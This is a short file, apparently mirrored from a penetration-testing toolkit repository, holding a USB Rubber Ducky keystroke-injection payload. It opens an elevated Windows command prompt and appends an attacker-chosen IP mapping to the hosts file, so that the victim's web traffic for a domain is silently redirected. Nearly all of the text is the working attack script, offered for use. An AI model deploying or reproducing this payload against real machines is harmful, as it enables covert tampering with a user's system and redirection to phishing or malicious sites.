mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-08-04 04:34:28 -04:00
19 lines
No EOL
337 B
Text
19 lines
No EOL
337 B
Text
Payload will edit the hosts file to allow you to redirect web pages where you would like the user to go.
|
|
|
|
|
|
DELAY 2000
|
|
ESCAPE
|
|
CONTROL ESCAPE
|
|
DELAY 400
|
|
STRING cmd
|
|
DELAY 400
|
|
CTRL-SHIFT ENTER
|
|
DELAY 400
|
|
STRING cd C:\Windows\System32\drivers\etc\
|
|
ENTER
|
|
DELAY 400
|
|
STRING echo 64.149.122.94 www.test.com>>hosts
|
|
ENTER
|
|
DELAY 400
|
|
ALT SPACE
|
|
STRING c |